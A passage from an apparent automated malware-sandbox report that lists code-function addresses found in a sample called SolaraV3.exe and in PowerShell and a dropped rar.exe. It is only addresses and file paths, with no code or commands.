              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC712C101_2_00007FF6DC712C10
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC723C101_2_00007FF6DC723C10
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7264181_2_00007FF6DC726418
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7208C81_2_00007FF6DC7208C8
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC711B501_2_00007FF6DC711B50
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC715D301_2_00007FF6DC715D30
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC70A47B1_2_00007FF6DC70A47B
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC70ACAD1_2_00007FF6DC70ACAD
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7010002_2_00007FF6DC701000
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7269642_2_00007FF6DC726964
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC70A2DB2_2_00007FF6DC70A2DB
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC711D542_2_00007FF6DC711D54
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC71E5702_2_00007FF6DC71E570
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7135A02_2_00007FF6DC7135A0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC71DEF02_2_00007FF6DC71DEF0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7297282_2_00007FF6DC729728
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC725E7C2_2_00007FF6DC725E7C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC719EA02_2_00007FF6DC719EA0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7098002_2_00007FF6DC709800
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7117402_2_00007FF6DC711740
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC711F602_2_00007FF6DC711F60
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7187942_2_00007FF6DC718794
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7208C82_2_00007FF6DC7208C8
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7180E42_2_00007FF6DC7180E4
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7218742_2_00007FF6DC721874
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7240AC2_2_00007FF6DC7240AC
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7089E02_2_00007FF6DC7089E0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7119442_2_00007FF6DC711944
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7121642_2_00007FF6DC712164
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7139A42_2_00007FF6DC7139A4
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC71DA5C2_2_00007FF6DC71DA5C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC725C002_2_00007FF6DC725C00
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC712C102_2_00007FF6DC712C10
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC723C102_2_00007FF6DC723C10
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7264182_2_00007FF6DC726418
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC7208C82_2_00007FF6DC7208C8
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC711B502_2_00007FF6DC711B50
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC715D302_2_00007FF6DC715D30
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC70A47B2_2_00007FF6DC70A47B
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC70ACAD2_2_00007FF6DC70ACAD
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0BB66EE02_2_00007FFB0BB66EE0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B811EA62_2_00007FFB0B811EA6
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8159342_2_00007FFB0B815934
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B814A592_2_00007FFB0B814A59
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B813B982_2_00007FFB0B813B98
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B812D792_2_00007FFB0B812D79
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B815D8A2_2_00007FFB0B815D8A
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81516E2_2_00007FFB0B81516E
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9489602_2_00007FFB0B948960
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B816CBC2_2_00007FFB0B816CBC
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B816A872_2_00007FFB0B816A87
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B811F9B2_2_00007FFB0B811F9B
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B813FDF2_2_00007FFB0B813FDF
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81655F2_2_00007FFB0B81655F
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8121BC2_2_00007FFB0B8121BC
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0BA50E002_2_00007FFB0BA50E00
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8160A02_2_00007FFB0B8160A0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8122ED2_2_00007FFB0B8122ED
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8111402_2_00007FFB0B811140
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B816F282_2_00007FFB0B816F28
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81704A2_2_00007FFB0B81704A
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8C04402_2_00007FFB0B8C0440
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B82C4802_2_00007FFB0B82C480
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8172C52_2_00007FFB0B8172C5
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B815B142_2_00007FFB0B815B14
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B812C7A2_2_00007FFB0B812C7A
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9B41702_2_00007FFB0B9B4170
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8141062_2_00007FFB0B814106
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B815B782_2_00007FFB0B815B78
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B816C212_2_00007FFB0B816C21
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B814B5B2_2_00007FFB0B814B5B
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8129D22_2_00007FFB0B8129D2
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B82C6202_2_00007FFB0B82C620
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81177B2_2_00007FFB0B81177B
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B94C6602_2_00007FFB0B94C660
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8121442_2_00007FFB0B812144
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8146382_2_00007FFB0B814638
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8125F42_2_00007FFB0B8125F4
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8169E72_2_00007FFB0B8169E7
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B93DC502_2_00007FFB0B93DC50
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8136022_2_00007FFB0B813602
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B811D022_2_00007FFB0B811D02
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9C99D02_2_00007FFB0B9C99D0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B813A8A2_2_00007FFB0B813A8A
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8159FC2_2_00007FFB0B8159FC
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B814C192_2_00007FFB0B814C19
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B812FD12_2_00007FFB0B812FD1
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8111CC2_2_00007FFB0B8111CC
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8127612_2_00007FFB0B812761
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8122B12_2_00007FFB0B8122B1
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8172AC2_2_00007FFB0B8172AC
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8116222_2_00007FFB0B811622
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81736A2_2_00007FFB0B81736A
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B811D882_2_00007FFB0B811D88
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9414902_2_00007FFB0B941490
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8132EC2_2_00007FFB0B8132EC
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81228E2_2_00007FFB0B81228E
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8155152_2_00007FFB0B815515
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81428C2_2_00007FFB0B81428C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B82D2602_2_00007FFB0B82D260
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8130C62_2_00007FFB0B8130C6
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B815BF52_2_00007FFB0B815BF5
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8352002_2_00007FFB0B835200
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9491302_2_00007FFB0B949130
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9B50B02_2_00007FFB0B9B50B0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9C91002_2_00007FFB0B9C9100
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81710D2_2_00007FFB0B81710D
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8114242_2_00007FFB0B811424
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8154D42_2_00007FFB0B8154D4
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9517602_2_00007FFB0B951760
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B814C3C2_2_00007FFB0B814C3C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B812E912_2_00007FFB0B812E91
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B814ACA2_2_00007FFB0B814ACA
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81504C2_2_00007FFB0B81504C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81276B2_2_00007FFB0B81276B
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8156142_2_00007FFB0B815614
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B811B272_2_00007FFB0B811B27
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8115C82_2_00007FFB0B8115C8
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8154CF2_2_00007FFB0B8154CF
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B952C002_2_00007FFB0B952C00
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B813A942_2_00007FFB0B813A94
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B814D092_2_00007FFB0B814D09
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B815F102_2_00007FFB0B815F10
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8123F62_2_00007FFB0B8123F6
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B815DA32_2_00007FFB0B815DA3
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9CA9002_2_00007FFB0B9CA900
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8153AD2_2_00007FFB0B8153AD
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8144CB2_2_00007FFB0B8144CB
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B82F0602_2_00007FFB0B82F060
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81638E2_2_00007FFB0B81638E
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9B30102_2_00007FFB0B9B3010
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B814F432_2_00007FFB0B814F43
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8121712_2_00007FFB0B812171
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8153C62_2_00007FFB0B8153C6
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B82EF002_2_00007FFB0B82EF00
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81213A2_2_00007FFB0B81213A
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8F2CD02_2_00007FFB0B8F2CD0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8165642_2_00007FFB0B816564
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8112992_2_00007FFB0B811299
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8154342_2_00007FFB0B815434
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8136342_2_00007FFB0B813634
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B816EBF2_2_00007FFB0B816EBF
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B811A502_2_00007FFB0B811A50
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8112172_2_00007FFB0B811217
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8123012_2_00007FFB0B812301
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B816D5C2_2_00007FFB0B816D5C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8126EE2_2_00007FFB0B8126EE
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9C61002_2_00007FFB0B9C6100
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B814E532_2_00007FFB0B814E53
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8168CA2_2_00007FFB0B8168CA
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9525D02_2_00007FFB0B9525D0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81144C2_2_00007FFB0B81144C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B93E5F02_2_00007FFB0B93E5F0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8165A02_2_00007FFB0B8165A0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8144082_2_00007FFB0B814408
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81318E2_2_00007FFB0B81318E
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B816FFF2_2_00007FFB0B816FFF
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8110AA2_2_00007FFB0B8110AA
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81707C2_2_00007FFB0B81707C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81416A2_2_00007FFB0B81416A
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8136982_2_00007FFB0B813698
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81348B2_2_00007FFB0B81348B
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B82BF202_2_00007FFB0B82BF20
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8160DC2_2_00007FFB0B8160DC
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B815E252_2_00007FFB0B815E25
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B82BD602_2_00007FFB0B82BD60
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B943CC02_2_00007FFB0B943CC0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B815A652_2_00007FFB0B815A65
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B811CC62_2_00007FFB0B811CC6
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9474802_2_00007FFB0B947480
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B812D102_2_00007FFB0B812D10
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B813BA72_2_00007FFB0B813BA7
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8126712_2_00007FFB0B812671
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8129872_2_00007FFB0B812987
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8172572_2_00007FFB0B817257
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8138372_2_00007FFB0B813837
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B816EF12_2_00007FFB0B816EF1
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B83B1C02_2_00007FFB0B83B1C0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B82F2002_2_00007FFB0B82F200
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8150B02_2_00007FFB0B8150B0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81114F2_2_00007FFB0B81114F
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9CB0E02_2_00007FFB0B9CB0E0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8157D62_2_00007FFB0B8157D6
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B9477802_2_00007FFB0B947780
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81435E2_2_00007FFB0B81435E
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B87F7002_2_00007FFB0B87F700
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B8137922_2_00007FFB0B813792
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B81474B2_2_00007FFB0B81474B
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B811B362_2_00007FFB0B811B36
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B83B5502_2_00007FFB0B83B550
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C35B3602_2_00007FFB0C35B360
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C35168B2_2_00007FFB0C35168B
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C3520B32_2_00007FFB0C3520B3
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C3B0B502_2_00007FFB0C3B0B50
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C356BA02_2_00007FFB0C356BA0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C3515372_2_00007FFB0C351537
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C351DD42_2_00007FFB0C351DD4
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C35195B2_2_00007FFB0C35195B
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C3A02402_2_00007FFB0C3A0240
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C3B84602_2_00007FFB0C3B8460
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C3525722_2_00007FFB0C352572
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAA9470FDD14_2_00007FFAA9470FDD
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE9AE10110_2_00007FF74EE9AE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE7ABA0110_2_00007FF74EE7ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEA7B24110_2_00007FF74EEA7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE80A2C110_2_00007FF74EE80A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE71884110_2_00007FF74EE71884
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE7B540110_2_00007FF74EE7B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE854C0110_2_00007FF74EE854C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE81180110_2_00007FF74EE81180
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE782F0110_2_00007FF74EE782F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEAC00C110_2_00007FF74EEAC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB4FE8110_2_00007FF74EEB4FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEDDFD8110_2_00007FF74EEDDFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEDAF90110_2_00007FF74EEDAF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEA5F4C110_2_00007FF74EEA5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE90104110_2_00007FF74EE90104
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EED00F0110_2_00007FF74EED00F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEA0074110_2_00007FF74EEA0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE9C05C110_2_00007FF74EE9C05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEA8040110_2_00007FF74EEA8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE83030110_2_00007FF74EE83030
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE7EE08110_2_00007FF74EE7EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE81E04110_2_00007FF74EE81E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEC1DCC110_2_00007FF74EEC1DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB9D74110_2_00007FF74EEB9D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEA0D20110_2_00007FF74EEA0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEAAF0C110_2_00007FF74EEAAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE79EFC110_2_00007FF74EE79EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEBEEA4110_2_00007FF74EEBEEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE7CE84110_2_00007FF74EE7CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EECFE74110_2_00007FF74EECFE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE88E68110_2_00007FF74EE88E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEBAE50110_2_00007FF74EEBAE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEC9B98110_2_00007FF74EEC9B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB4B38110_2_00007FF74EEB4B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE99D0C110_2_00007FF74EE99D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEC6D0C110_2_00007FF74EEC6D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE7DD04110_2_00007FF74EE7DD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB5C8C110_2_00007FF74EEB5C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE88C30110_2_00007FF74EE88C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB69FD110_2_00007FF74EEB69FD
